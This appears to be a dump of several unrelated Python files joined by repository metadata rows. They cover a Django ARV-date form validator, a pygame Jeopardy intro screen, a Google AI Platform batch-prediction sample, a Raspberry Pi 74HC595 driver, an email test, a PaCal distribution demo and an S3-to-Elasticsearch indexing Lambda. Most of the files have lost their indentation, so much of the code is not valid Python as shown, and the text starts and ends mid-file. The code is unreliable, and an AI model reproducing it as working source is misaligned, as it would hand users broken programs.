cleaned_data = super(MaternalArvForm, self).clean()
self.validate_start_stop_date()
self.validate_took_arv()
self.validate_historical_and_present_arv_start_dates()
self.validate_previous_maternal_arv_preg_arv_start_dates()
self.validate_stop_date_reason_for_stop()
return cleaned_data
def validate_start_stop_date(self):
cleaned_data = self.cleaned_data
if cleaned_data.get('stop_date'):
if cleaned_data.get('stop_date') < cleaned_data.get('start_date'):
raise forms.ValidationError(
'Your stop date of {} is prior to start date of {}. '
'Please correct'.format(
cleaned_data.get('stop_date'), cleaned_data.get('start_date')))
def validate_took_arv(self):
cleaned_data = self.cleaned_data
took_arv = cleaned_data.get('maternal_arv_preg').took_arv
if took_arv == YES:
if not cleaned_data.get('arv_code'):
raise forms.ValidationError(
"You indicated that participant started ARV(s) during this "
"pregnancy. Please list them on 'Maternal ARV' table")
else:
if cleaned_data.get('arv_code'):
raise forms.ValidationError(
"You indicated that ARV(s) were NOT started during this pregnancy. "
"You cannot provide a list. Please Correct.")
def validate_historical_and_present_arv_start_dates(self):
"""Confirms that the ARV start date is not less than the Historical ARV start date"""
cleaned_data = self.cleaned_data
try:
maternal_visit = cleaned_data.get(
'maternal_arv_preg').maternal_visit
arv_history = MaternalLifetimeArvHistory.objects.get(
maternal_visit=maternal_visit)
if arv_history.haart_start_date:
start_date = cleaned_data.get('start_date')
if start_date < arv_history.haart_start_date:
raise forms.ValidationError(
"Your ARV start date {} in this pregnancy cannot be before your "
"Historical ARV date {}".format(
start_date, arv_history.haart_start_date))
except MaternalLifetimeArvHistory.DoesNotExist:
pass
def validate_previous_maternal_arv_preg_arv_start_dates(self):
"""Confirms that the ARV start date is equal to Maternal ARV
start date unless stopped.
"""
cleaned_data = self.cleaned_data
subject_identifier = cleaned_data.get(
'maternal_arv_preg').maternal_visit.appointment.registered_subject.subject_identifier
previous_visit = get_previous_visit(
visit_obj=cleaned_data.get('maternal_arv_preg').maternal_visit,
timepoints=['1000M', '1020M', '2000M'],
subject_identifier=subject_identifier)
if previous_visit:
previous_arv_preg = MaternalArv.objects.filter(
maternal_arv_preg__maternal_visit__appointment__registered_subject__subject_identifier=subject_identifier,
stop_date__isnull=True).order_by('start_date').first()
if previous_arv_preg:
if previous_arv_preg.start_date:
start_date = cleaned_data.get('start_date')
if start_date < previous_arv_preg.start_date:
raise forms.ValidationError(
"New start date cannot be before initial ARV start date, "
"initial date: {}, new start date: {}.".format(
previous_arv_preg.start_date, start_date))
def validate_stop_date_reason_for_stop(self):
cleaned_data = self.cleaned_data
if cleaned_data.get('stop_date'):
if not cleaned_data.get('reason_for_stop'):
raise forms.ValidationError(
{'reason_for_stop': 'ARV stopped, please give reason for stop.'})
        else:
            if cleaned_data.get('reason_for_stop'):
                raise forms.ValidationError(
                    {'reason_for_stop': 'ARV not stopped, do not give reason for stop.'})
class Meta:
model = MaternalArv
fields = '__all__'
| gpl-2.0 | -5,251,576,594,172,909,000 | 45.888889 | 133 | 0.598697 | false |
spadgenske/Jeopardy | jeoparpy/ui/intro.py | 1 | 6128 | """
intro.py
DESCRIPTION:
Functions implementing the beginning of the JeoparPy introduction sequence.
Intro music plays, the title fades in over a background, and the subtitle
appears. Upon pressing any key, the rules screen appears. Pressing a key
again ends the sequence.
USAGE:
Main should only need to call do_intro.
Copyright (C) 2013 Adam Beagle - All Rights Reserved
You may use, distribute, and modify this code under
the terms of the GNU General Public License,
viewable at http://opensource.org/licenses/GPL-3.0
This copyright notice must be retained with any use
of source code from this file..
"""
import pygame
from pygame.locals import KEYDOWN, QUIT
from constants import JEOP_BLUE, RULES, SUBTITLE
from resmaps import FONTS, IMAGES
from util import (draw_centered_textblock, draw_textline, restrict_fontsize,
scale, shadow_text, wait_for_keypress)
###############################################################################
def do_intro(screen, clock, audioplayer):
"""
Draw JeoparPy title animation to screen.
Note control of application passed completely to this function from main.
"""
# Declarations
scrSize = screen.get_size()
bannerColor = (0, 0, 50)
music = audioplayer.sounds['intro']
background, bgRect = _build_background(scrSize)
background.blit(*_build_banner(bgRect, bannerColor))
rules, rulesRect = _build_rules(bgRect)
title, titleRect = _build_title_text(bgRect, bannerColor)
# Start intro sequence
pygame.event.set_allowed(None)
screen.blit(background, (0, 0))
pygame.display.update()
music.play()
# Fade in title (control passed to function)
_fade_in_title(screen, background, title, titleRect, bannerColor, clock)
# Draw subtitle and wait for keypress
_blit_subtitle(background, bgRect, titleRect)
pygame.event.set_allowed([KEYDOWN, QUIT])
_update_and_wait_for_keypress(screen, background)
# Draw rules and wait for keypress
music.set_volume(0.7)
background.blit(rules, rulesRect)
_update_and_wait_for_keypress(screen, background)
music.fadeout(1000)
pygame.time.delay(1000)
###############################################################################
def _update_and_wait_for_keypress(screen, background):
screen.blit(background, (0, 0))
pygame.display.update()
wait_for_keypress()
def _blit_subtitle(background, scrRect, titleRect):
"""
Creates subtitle and its shadow, then blits both onto background.
'scrRect' is Rect the size of entire screen.
'titleRect' is Rect of title text.
"""
# Render subtitle text
size = int(52 * (scrRect.h / 768.0))
offset = int(20 * (scrRect.h / 768.0))
font = pygame.font.Font(FONTS['subtitle'], size)
text = font.render(SUBTITLE, 1, (255, 255, 255))
# Position subtitle
rect = text.get_rect()
rect.centerx = scrRect.centerx
rect.y = titleRect.bottom + offset
# Create shadow
shadow, shadRect = shadow_text(SUBTITLE, rect, font, 2)
# Blit both to background
background.blit(shadow, shadRect)
background.blit(text, rect)
def _build_background(scrSize):
background = pygame.image.load(IMAGES['introBG']).convert()
background = pygame.transform.scale(background, scrSize)
return background, background.get_rect()
def _build_banner(scrRect, color):
"""
Return 2-tuple containing title banner surface and its Rect,
already positioned to be drawn.
Arguments are a pygame.Rect object the size of the screen, and the
color of the banner.
"""
size = (scrRect.w, scale(175, scrRect.h, 768))
banner = pygame.Surface(size)
banner.fill(color)
rect = banner.get_rect()
rect.centery = scrRect.centery
return (banner, rect)
def _build_rules(scrRect):
"""Return tuple of fully drawn rules surface and its rect."""
header = '--RULES--'
offset = scale(50, scrRect.h, 768)
rect = scrRect.copy()
rect.inflate_ip(-offset, -offset)
sfc = pygame.Surface(rect.size)
font = pygame.font.Font(FONTS['rules'], scale(80, scrRect.h, 768))
# Draw header
sfc.fill(JEOP_BLUE)
headerRect = pygame.Rect((0, int(.05*rect.h)), font.size(header))
headerRect.centerx = rect.centerx
draw_textline(sfc, header, font, (255, 255, 255),
headerRect, scale(6, scrRect.h, 768))
# Draw rules
bounds = tuple(.9*x for x in scrRect.size)
fsize = restrict_fontsize(FONTS['rules'], scale(50, scrRect.h, 768),
RULES, bounds)
font = pygame.font.Font(FONTS['rules'], fsize)
draw_centered_textblock(sfc, RULES, font, (255, 255, 255), 0,
scale(4, scrRect.h, 768), False)
sfc.set_alpha(240)
return sfc, rect
def _build_title_text(scrRect, bgColor):
"""
Return 2-tuple containing title text surface and its Rect, already
positioned to be drawn.
Arguments are a pygame.Rect object the size of the screen,
and the background color of the text.
"""
size = int(150 * (scrRect.h / 768.0))
font = pygame.font.Font(FONTS['title'], size)
# Note: bgColor required so set_alpha can be called on text.
text = font.render("JeoparPy!", 1, (230, 230, 230), bgColor)
rect = text.get_rect()
rect.center = scrRect.center
return (text, rect)
def _fade_in_title(screen, background, text, textRect, bannerColor, clock):
fpsGoal = int(255 / 7.8) #frames to draw / time to spend in secs
pygame.time.delay(2000)
for alpha in xrange(256):
background.fill(bannerColor, textRect)
text.set_alpha(alpha)
background.blit(text, textRect)
screen.blit(background, textRect, textRect)
pygame.display.update(textRect)
clock.tick_busy_loop(fpsGoal)
###############################################################################
if __name__ == '__main__':
#Test run
pygame.init()
screen = pygame.display.set_mode((800, 450))
clock = pygame.time.Clock()
screen.fill((0, 0, 0))
do_intro(screen, clock)
| gpl-3.0 | 8,658,366,588,429,702,000 | 31.595745 | 79 | 0.641155 | false |
googleapis/python-aiplatform | .sample_configs/param_handlers/create_batch_prediction_job_custom_image_explain_sample.py | 1 | 2027 | # Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
def make_parent(parent: str) -> str:
parent = parent
return parent
def make_batch_prediction_job(display_name: str, model_name: str, instances_format: str, gcs_source_uri: str, predictions_format: str, gcs_destination_output_uri_prefix: str) -> google.cloud.aiplatform_v1alpha1.types.batch_prediction_job.BatchPredictionJob:
model_parameters_dict = {}
model_parameters = to_protobuf_value(model_parameters_dict)
batch_prediction_job = {
'display_name': display_name,
# Format: 'projects/{project}/locations/{location}/models/{model_id}'
'model': model_name,
'model_parameters': model_parameters,
'input_config': {
'instances_format': instances_format,
'gcs_source': {
'uris': [gcs_source_uri]
},
},
'output_config': {
'predictions_format': predictions_format,
'gcs_destination': {
'output_uri_prefix': gcs_destination_output_uri_prefix
},
},
'dedicated_resources': {
'machine_spec': {
'machine_type': 'n1-standard-2',
'accelerator_type': aiplatform.gapic.AcceleratorType.NVIDIA_TESLA_K80,
'accelerator_count': 1
},
'starting_replica_count': 1,
'max_replica_count': 1
},
'generate_explanation': True
}
return batch_prediction_job
| apache-2.0 | 726,643,331,524,627,700 | 35.854545 | 257 | 0.629995 | false |
spoonysonny/SAKS-tutorials | chengying/entities/ic_74hc595.py | 1 | 2361 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright (c) 2016 NXEZ.COM.
# http://www.nxez.com
#
# Licensed under the GNU General Public License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.gnu.org/licenses/gpl-2.0.html
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
__author__ = 'Spoony'
__version__ = 'version 0.0.1'
__license__ = 'Copyright (c) 2016 NXEZ.COM'
import RPi.GPIO as GPIO
import time
class IC_74HC595(object):
'''
IC_74HC595 class
'''
__pins = {'ds':0, 'shcp':0, 'stcp':0}
__real_true = GPIO.HIGH
__data = 0x00
def __init__(self, pins, real_true = GPIO.HIGH):
'''
Init the ic
:param pin: pin number
:param real_true: GPIO.HIGH or GPIO.LOW
:return: void
'''
self.__pins = pins
self.__real_true = real_true
#Stauts.
@property
def data(self):
'''
Return the data
:return: void
'''
return self.__data
#Verbs.
def flush_shcp(self):
'''
Flush a shcp
:return: void
'''
GPIO.output(self.__pins['shcp'], not self.__real_true)
GPIO.output(self.__pins['shcp'], self.__real_true)
def flush_stcp(self):
'''
Flush a stcp
:return: void
'''
GPIO.output(self.__pins['stcp'], not self.__real_true)
GPIO.output(self.__pins['stcp'], self.__real_true)
def set_bit(self, bit):
'''
Set a bit
:param bit: bit
:return: void
'''
GPIO.output(self.__pins['ds'], bit)
self.flush_shcp()
def set_data(self, data):
'''
Set a byte
:param data: data
:return: void
'''
self.__data = data
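        # shift the byte out LSB-first, then latch it onto the outputs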
for i in range (0, 8):
self.set_bit((self.__data >> i) & 0x01)
self.flush_stcp()
def clear(self):
'''
Clear the data
:return: void
'''
self.set_data(0x00)
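

# Example usage -- a minimal sketch; the BCM pin numbers below are
# assumptions, adjust them to match your wiring:
if __name__ == '__main__':
    GPIO.setmode(GPIO.BCM)
    pins = {'ds': 6, 'shcp': 19, 'stcp': 13}
    for pin in pins.values():
        GPIO.setup(pin, GPIO.OUT)
    ic = IC_74HC595(pins)
    ic.set_data(0xAA)   # shift out 0b10101010 and latch it
    time.sleep(1)
    ic.clear()
    GPIO.cleanup()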
| gpl-2.0 | 7,145,231,907,859,546,000 | 23.340206 | 77 | 0.547649 | false |
Yelp/love | tests/logic/email_test.py | 1 | 1380 | # -*- coding: utf-8 -*-
import mock
import unittest
import logic.email
class EmailTest(unittest.TestCase):
"""We really just want to test that configuration is honored here."""
sender = '[email protected]'
recipient = '[email protected]'
subject = 'test subject'
html = '<p>hello test</p>'
text = 'hello test'
@mock.patch('logic.email.EMAIL_BACKENDS')
@mock.patch('logic.email.config')
def test_send_email_appengine(self, mock_config, mock_backends):
mock_config.EMAIL_BACKEND = 'appengine'
mock_backends['appengine'] = mock.Mock()
logic.email.send_email(self.sender, self.recipient, self.subject,
self.html, self.text)
mock_backends['appengine'].assert_called_once_with(
self.sender, self.recipient, self.subject, self.html, self.text
)
@mock.patch('logic.email.EMAIL_BACKENDS')
@mock.patch('logic.email.config')
def test_send_email_sendgrid(self, mock_config, mock_backends):
mock_config.EMAIL_BACKEND = 'sendgrid'
mock_backends['sendgrid'] = mock.Mock()
logic.email.send_email(self.sender, self.recipient, self.subject,
self.html, self.text)
mock_backends['sendgrid'].assert_called_once_with(
self.sender, self.recipient, self.subject, self.html, self.text
)
| mit | -5,685,770,015,636,197,000 | 36.297297 | 75 | 0.632609 | false |
dkasak/pacal | pacal/examples/singularities.py | 1 | 2567 | #!===================================================================
#! Examples of distributions with singularities
#!===================================================================
from functools import partial
from pylab import *
from mpl_toolkits.axes_grid.inset_locator import zoomed_inset_axes
from mpl_toolkits.axes_grid.inset_locator import mark_inset
from pacal import *
from pacal.distr import demo_distr
if __name__ == "__main__":
#!-------------------------------------------
#! Product of two shifted normal variables
#!-------------------------------------------
#! such a product always has a singularity at 0, but the further the factors' means are from zero, the 'lighter' the singularity becomes
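    #! For two independent N(0,1) factors the density is known in closed form:
    #! f(z) = K_0(|z|) / pi, where K_0 is the modified Bessel function of the
    #! second kind, so the pdf diverges logarithmically at z = 0. (Assuming
    #! scipy is available, this could be checked by passing
    #! theoretical=lambda x: k0(abs(x))/pi to demo_distr, with
    #! `from scipy.special import k0`.)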
figure()
d = NormalDistr(0,1) * NormalDistr(0,1)
demo_distr(d, ymax=1.5, xmin=-5, xmax=5)
#show()
figure()
d = NormalDistr(1,1) * NormalDistr(1,1)
demo_distr(d)
#show()
figure()
d = NormalDistr(2,1) * NormalDistr(2,1)
demo_distr(d)
#show()
figure()
d = NormalDistr(3,1) * NormalDistr(3,1)
d.plot()
d.hist()
ax=gca()
axins = zoomed_inset_axes(ax, 6, loc=1)
d.plot(xmin=-1.5, xmax=1.5)
axins.set_xlim(-1.5, 1.5)
xticks(rotation="vertical")
axins.set_ylim(0, 0.01)
mark_inset(ax, axins, loc1=2, loc2=4, fc="none", ec="0.5")
#show()
figure()
d = NormalDistr(4,1) * NormalDistr(4,1)
d.plot()
d.hist()
ax=gca()
axins = zoomed_inset_axes(ax, 12000, loc=1)
d.plot(xmin=-.001, xmax=.001)
axins.set_xlim(-.001, .001)
xticks(rotation="vertical")
axins.set_ylim(0.000072, 0.000075)
mark_inset(ax, axins, loc1=2, loc2=4, fc="none", ec="0.5")
#show()
# demo_distr(UniformDistr(0,1) * NormalDistr(0,1) * NormalDistr(0,1) * NormalDistr(0,1) * NormalDistr(0,1)* NormalDistr(0,1) * NormalDistr(0,1))
#!-------------------------------------------
#! Product of six uniform distributions
#!-------------------------------------------
def prod_uni_pdf(n, x):
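        # density of the product of n independent U(0,1) variables:
        # (-ln x)^(n-1) / (n-1)!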
pdf = (-log(x)) ** (n-1)
for i in xrange(2, n):
pdf /= i
return pdf
figure()
d = UniformDistr(0,1) * UniformDistr(0,1) * UniformDistr(0,1) * UniformDistr(0,1) * UniformDistr(0,1) * UniformDistr(0,1)
demo_distr(d, ymax=100, xmin=-0.01, xmax=0.3, theoretical = partial(prod_uni_pdf, 6))
#show()
# figure()
# demo_distr(UniformDistr(0,1.1) * UniformDistr(0,1.1) * UniformDistr(0,1) * UniformDistr(0,1) * UniformDistr(0,1) * UniformDistr(0,1))
show()
| gpl-3.0 | -4,821,428,241,829,560,000 | 31.493671 | 150 | 0.534086 | false |
quiltdata/quilt-compiler | lambdas/es/indexer/index.py | 1 | 23450 | """
send documents representing object data to elasticsearch for supported file extensions.
note: we truncate outbound documents to DOC_SIZE_LIMIT characters
(to bound memory pressure and request size to elastic)
a little knowledge on deletes and delete markers:
if bucket versioning is on:
- `aws s3api delete-object (no --version-id)` or `aws s3 rm`
- push a new delete marker onto the stack with a version-id
- generate ObjectRemoved:DeleteMarkerCreated
if bucket versioning was on and is then turned off:
- `aws s3 rm` or `aws s3api delete-object (no --version-id)`
- replace event at top of stack
- if a versioned delete marker, push a new one on top of it
- if an un-versioned delete marker, replace that marker with new marker
with version "null" (ObjectCreate will similarly replace the same with an object
of version "null")
- if object, destroy object
- generate ObjectRemoved:DeleteMarkerCreated
- problem: no way of knowing if DeleteMarkerCreated destroyed bytes
or just created a DeleteMarker; this is usually given by the return
value of `delete-object` but the S3 event has no knowledge of the same
- `aws s3api delete-object --version-id VERSION`
- destroy corresponding delete marker or object; v may be null in which
case it will destroy the object with version null (occurs when adding
      new objects to a bucket that was versioned but no longer is)
- generate ObjectRemoved:Deleted
if bucket versioning is off and has always been off:
- `aws s3 rm` or `aws s3api delete-object`
- destroy object
- generate a single ObjectRemoved:Deleted
counterintuitive things:
- turning off versioning doesn't mean version stack can't get deeper (by at
least 1) as indicated above in the case where a new marker is pushed onto
the version stack
"""
import datetime
import json
from typing import Optional
import pathlib
import re
from os.path import split
from urllib.parse import unquote, unquote_plus
import boto3
import botocore
import nbformat
from tenacity import retry, retry_if_exception, stop_after_attempt, wait_exponential
from t4_lambda_shared.preview import (
ELASTIC_LIMIT_BYTES,
ELASTIC_LIMIT_LINES,
extract_fcs,
extract_parquet,
get_bytes,
get_preview_lines,
trim_to_bytes
)
from t4_lambda_shared.utils import (
get_available_memory,
get_quilt_logger,
MANIFEST_PREFIX_V1,
POINTER_PREFIX_V1,
query_manifest_content,
separated_env_to_iter,
)
from document_queue import (
DocTypes,
DocumentQueue,
CONTENT_INDEX_EXTS,
EVENT_PREFIX,
MAX_RETRY
)
# 10 MB, see https://amzn.to/2xJpngN
NB_VERSION = 4 # default notebook version for nbformat
# currently only affects .parquet, TODO: extend to other extensions
SKIP_ROWS_EXTS = separated_env_to_iter('SKIP_ROWS_EXTS')
SELECT_PACKAGE_META = "SELECT * from S3Object o WHERE o.version IS NOT MISSING LIMIT 1"
# No WHERE clause needed for aggregations since S3 Select skips missing fields for aggs
SELECT_PACKAGE_STATS = "SELECT SUM(obj['size']) as total_bytes, COUNT(obj['size']) as total_files from S3Object obj"
TEST_EVENT = "s3:TestEvent"
# we need to filter out GetObject and HeadObject calls generated by the present
# lambda in order to display accurate analytics in the Quilt catalog
# a custom user agent enables said filtration
USER_AGENT_EXTRA = " quilt3-lambdas-es-indexer"
def now_like_boto3():
"""ensure timezone UTC for consistency with boto3:
Example of what boto3 returns on head_object:
'LastModified': datetime.datetime(2019, 11, 6, 3, 1, 16, tzinfo=tzutc()),
"""
return datetime.datetime.now(tz=datetime.timezone.utc)
def should_retry_exception(exception):
"""don't retry certain 40X errors"""
if hasattr(exception, 'response'):
error_code = exception.response.get('Error', {}).get('Code', 218)
return error_code not in ["402", "403", "404"]
return False
def infer_extensions(key, ext):
"""guess extensions if possible"""
# Handle special case of hive partitions
# see https://www.qubole.com/blog/direct-writes-to-increase-spark-performance/
if (
re.fullmatch(r".c\d{3,5}", ext) or re.fullmatch(r".*-c\d{3,5}$", key)
or key.endswith("_0")
or ext == ".pq"
):
return ".parquet"
return ext
@retry(
stop=stop_after_attempt(MAX_RETRY),
wait=wait_exponential(multiplier=2, min=4, max=30),
retry=(retry_if_exception(should_retry_exception))
)
def select_manifest_meta(s3_client, bucket: str, key: str):
"""
wrapper for retry and returning a string
"""
try:
raw = query_manifest_content(
s3_client,
bucket=bucket,
key=key,
sql_stmt=SELECT_PACKAGE_META
)
return raw.read()
except botocore.exceptions.ClientError as cle:
print(f"Unable to S3 select manifest: {cle}")
return None
def index_if_manifest(
s3_client,
doc_queue: DocumentQueue,
event_type: str,
*,
bucket: str,
etag: str,
ext: str,
key: str,
last_modified: str,
version_id: Optional[str],
size: int
) -> bool:
"""index manifest files as package documents in ES
Returns:
- True if manifest (and passes to doc_queue for indexing)
- False if not a manifest (no attempt at indexing)
"""
logger_ = get_quilt_logger()
pointer_prefix, pointer_file = split(key)
handle = pointer_prefix[len(POINTER_PREFIX_V1):]
if (
not pointer_prefix.startswith(POINTER_PREFIX_V1)
or len(handle) < 3
or '/' not in handle
):
logger_.debug("Not indexing as manifest file s3://%s/%s", bucket, key)
return False
try:
manifest_timestamp = int(pointer_file)
except ValueError as err:
logger_.debug("Non-integer manifest pointer: s3://%s/%s, %s", bucket, key, err)
# this is probably the latest pointer, skip it. manifest already indexed.
return False
else:
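        # sanity bounds on the pointer timestamp: roughly 2016-01-01 through
        # 2026-01-01 in epoch seconds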
if not 1451631600 <= manifest_timestamp <= 1767250800:
logger_.warning("Unexpected manifest timestamp s3://%s/%s", bucket, key)
return False
package_hash = get_plain_text(
bucket,
key,
size,
None,
etag=etag,
s3_client=s3_client,
version_id=version_id,
).strip()
manifest_key = f"{MANIFEST_PREFIX_V1}{package_hash}"
first = select_manifest_meta(s3_client, bucket, manifest_key)
stats = select_package_stats(s3_client, bucket, manifest_key)
if not first:
logger_.error("S3 select failed %s %s", bucket, manifest_key)
return False
try:
first_dict = json.loads(first)
doc_queue.append(
event_type,
DocTypes.PACKAGE,
bucket=bucket,
etag=etag,
ext=ext,
handle=handle,
key=manifest_key,
last_modified=last_modified,
package_hash=package_hash,
package_stats=stats,
pointer_file=pointer_file,
comment=str(first_dict.get("message", "")),
metadata=json.dumps(first_dict.get("user_meta", {})),
)
return True
except (json.JSONDecodeError, botocore.exceptions.ClientError) as exc:
print(
f"{exc}\n"
f"\tFailed to select first line of manifest s3://{bucket}/{key}."
f"\tGot {first}."
)
return False
def select_package_stats(s3_client, bucket, manifest_key) -> Optional[dict]:
"""use s3 select to generate file stats for package"""
logger_ = get_quilt_logger()
try:
raw_stats = query_manifest_content(
s3_client,
bucket=bucket,
key=manifest_key,
sql_stmt=SELECT_PACKAGE_STATS
).read()
stats = json.loads(raw_stats)
assert isinstance(stats['total_bytes'], int)
assert isinstance(stats['total_files'], int)
return stats
except (botocore.exceptions.ClientError, AssertionError, KeyError) as err:
logger_.error("Unable to compute package status via S3 select: %s", err)
return None
def maybe_get_contents(bucket, key, ext, *, etag, version_id, s3_client, size):
"""get the byte contents of a file if it's a target for deep indexing"""
if ext.endswith('.gz'):
compression = 'gz'
ext = ext[:-len('.gz')]
else:
compression = None
content = ""
inferred_ext = infer_extensions(key, ext)
if inferred_ext in CONTENT_INDEX_EXTS:
if inferred_ext == ".fcs":
obj = retry_s3(
"get",
bucket,
key,
size,
etag=etag,
s3_client=s3_client,
version_id=version_id
)
body, info = extract_fcs(get_bytes(obj["Body"], compression), as_html=False)
# be smart and just send column names to ES (instead of bloated full schema)
# if this is not an HTML/catalog preview
content = trim_to_bytes(f"{body}\n{info}", ELASTIC_LIMIT_BYTES)
if inferred_ext == ".ipynb":
content = trim_to_bytes(
# we have no choice but to fetch the entire notebook, because we
# are going to parse it
# warning: huge notebooks could spike memory here
get_notebook_cells(
bucket,
key,
size,
compression,
etag=etag,
s3_client=s3_client,
version_id=version_id
),
ELASTIC_LIMIT_BYTES
)
elif inferred_ext == ".parquet":
if size >= get_available_memory():
print(f"{bucket}/{key} too large to deserialize; skipping contents")
# at least index the key and other stats, but don't overrun memory
# and fail indexing altogether
return ""
obj = retry_s3(
"get",
bucket,
key,
size,
etag=etag,
s3_client=s3_client,
version_id=version_id
)
body, info = extract_parquet(
get_bytes(obj["Body"], compression),
as_html=False,
skip_rows=(inferred_ext in SKIP_ROWS_EXTS)
)
# be smart and just send column names to ES (instead of bloated full schema)
# if this is not an HTML/catalog preview
columns = ','.join(list(info['schema']['names']))
content = trim_to_bytes(f"{columns}\n{body}", ELASTIC_LIMIT_BYTES)
else:
content = get_plain_text(
bucket,
key,
size,
compression,
etag=etag,
s3_client=s3_client,
version_id=version_id
)
return content
def extract_text(notebook_str):
""" Extract code and markdown
Args:
* nb - notebook as a string
Returns:
* str - select code and markdown source (and outputs)
Pre:
* notebook is well-formed per notebook version 4
* "cell_type" is defined for all cells
* "source" defined for all "code" and "markdown" cells
Throws:
* Anything nbformat.reads() can throw :( which is diverse and poorly
documented, hence the `except Exception` in handler()
Notes:
* Deliberately decided not to index output streams and display strings
because they were noisy and low value
* Tested this code against ~6400 Jupyter notebooks in
s3://alpha-quilt-storage/tree/notebook-search/
* Might be useful to index "cell_type" : "raw" in the future
See also:
* Format reference https://nbformat.readthedocs.io/en/latest/format_description.html
"""
formatted = nbformat.reads(notebook_str, as_version=NB_VERSION)
text = []
for cell in formatted.get("cells", []):
if "source" in cell and cell.get("cell_type") in ("code", "markdown"):
text.append(cell["source"])
return "\n".join(text)
def get_notebook_cells(bucket, key, size, compression, *, etag, s3_client, version_id):
"""extract cells for ipynb notebooks for indexing"""
text = ""
try:
obj = retry_s3(
"get",
bucket,
key,
size,
etag=etag,
s3_client=s3_client,
version_id=version_id
)
data = get_bytes(obj["Body"], compression)
notebook = data.getvalue().decode("utf-8")
try:
text = extract_text(notebook)
except (json.JSONDecodeError, nbformat.reader.NotJSONError):
print(f"Invalid JSON in {key}.")
except (KeyError, AttributeError) as err:
print(f"Missing key in {key}: {err}")
# there might be more errors than covered by test_read_notebook
# better not to fail altogether
except Exception as exc: # pylint: disable=broad-except
print(f"Exception in file {key}: {exc}")
except UnicodeDecodeError as uni:
print(f"Unicode decode error in {key}: {uni}")
return text
def get_plain_text(
bucket,
key,
size,
compression,
*,
etag,
s3_client,
version_id
) -> str:
"""get plain text object contents"""
text = ""
try:
obj = retry_s3(
"get",
bucket,
key,
size,
etag=etag,
s3_client=s3_client,
limit=ELASTIC_LIMIT_BYTES,
version_id=version_id
)
lines = get_preview_lines(
obj["Body"],
compression,
ELASTIC_LIMIT_LINES,
ELASTIC_LIMIT_BYTES
)
text = '\n'.join(lines)
except UnicodeDecodeError as ex:
print(f"Unicode decode error in {key}", ex)
return text
def make_s3_client():
"""make a client with a custom user agent string so that we can
filter the present lambda's requests to S3 from object analytics"""
configuration = botocore.config.Config(user_agent_extra=USER_AGENT_EXTRA)
return boto3.client("s3", config=configuration)
def handler(event, context):
"""enumerate S3 keys in event, extract relevant data, queue events, send to
elastic via bulk() API
"""
logger_ = get_quilt_logger()
# message is a proper SQS message, which either contains a single event
# (from the bucket notification system) or batch-many events as determined
# by enterprise/**/bulk_loader.py
# An exception that we'll want to re-raise after the batch sends
content_exception = None
for message in event["Records"]:
body = json.loads(message["body"])
body_message = json.loads(body["Message"])
if "Records" not in body_message:
if body_message.get("Event") == TEST_EVENT:
logger_.debug("Skipping S3 Test Event")
# Consume and ignore this event, which is an initial message from
# SQS; see https://forums.aws.amazon.com/thread.jspa?threadID=84331
continue
print("Unexpected message['body']. No 'Records' key.", message)
raise Exception("Unexpected message['body']. No 'Records' key.")
batch_processor = DocumentQueue(context)
events = body_message.get("Records", [])
s3_client = make_s3_client()
# event is a single S3 event
for event_ in events:
logger_.debug("Processing %s", event_)
try:
event_name = event_["eventName"]
# Process all Create:* and Remove:* events
if not any(event_name.startswith(n) for n in EVENT_PREFIX.values()):
continue
bucket = unquote(event_["s3"]["bucket"]["name"])
# In the grand tradition of IE6, S3 events turn spaces into '+'
key = unquote_plus(event_["s3"]["object"]["key"])
version_id = event_["s3"]["object"].get("versionId")
version_id = unquote(version_id) if version_id else None
# Skip delete markers when versioning is on
if version_id and event_name == "ObjectRemoved:DeleteMarkerCreated":
continue
# ObjectRemoved:Delete does not include "eTag"
etag = unquote(event_["s3"]["object"].get("eTag", ""))
# Get two levels of extensions to handle files like .csv.gz
path = pathlib.PurePosixPath(key)
ext1 = path.suffix
ext2 = path.with_suffix('').suffix
ext = (ext2 + ext1).lower()
# Handle delete first and then continue so that
# head_object and get_object (below) don't fail
if event_name.startswith(EVENT_PREFIX["Removed"]):
logger_.debug("Object delete to queue")
batch_processor.append(
event_name,
DocTypes.OBJECT,
bucket=bucket,
ext=ext,
etag=etag,
key=key,
last_modified=now_like_boto3(),
text="",
version_id=version_id
)
continue
try:
logger_.debug("Get object head")
head = retry_s3(
"head",
bucket,
key,
s3_client=s3_client,
version_id=version_id,
etag=etag
)
except botocore.exceptions.ClientError as first:
logger_.warning("head_object error: %s", first)
# "null" version sometimes results in 403s for buckets
# that have changed versioning, retry without it
if (first.response.get('Error', {}).get('Code') == "403"
and version_id == "null"):
try:
head = retry_s3(
"head",
bucket,
key,
s3_client=s3_client,
version_id=None,
etag=etag
)
except botocore.exceptions.ClientError as second:
# this will bypass the DLQ but that's the right thing to do
# as some listed objects may NEVER succeed head requests
# (e.g. foreign owner) and there's no reason to torpedo
# the whole batch (which might include good files)
logger_.warning("Retried head_object error: %s", second)
logger_.error("Fatal head_object, skipping event: %s", event_)
continue
size = head["ContentLength"]
last_modified = head["LastModified"]
did_index = index_if_manifest(
s3_client,
batch_processor,
event_name,
bucket=bucket,
etag=etag,
ext=ext,
key=key,
last_modified=last_modified,
size=size,
version_id=version_id
)
logger_.debug("Logged as manifest? %s", did_index)
try:
text = maybe_get_contents(
bucket,
key,
ext,
etag=etag,
version_id=version_id,
s3_client=s3_client,
size=size
)
# we still want an entry for this document in elastic so that, e.g.,
# the file counts from elastic are correct. re-raise below.
except Exception as exc: # pylint: disable=broad-except
text = ""
content_exception = exc
logger_.error("Content extraction failed %s %s %s", bucket, key, exc)
batch_processor.append(
event_name,
DocTypes.OBJECT,
bucket=bucket,
key=key,
ext=ext,
etag=etag,
version_id=version_id,
last_modified=last_modified,
size=size,
text=text
)
except botocore.exceptions.ClientError as boto_exc:
if not should_retry_exception(boto_exc):
logger_.warning("Got exception but retrying: %s", boto_exc)
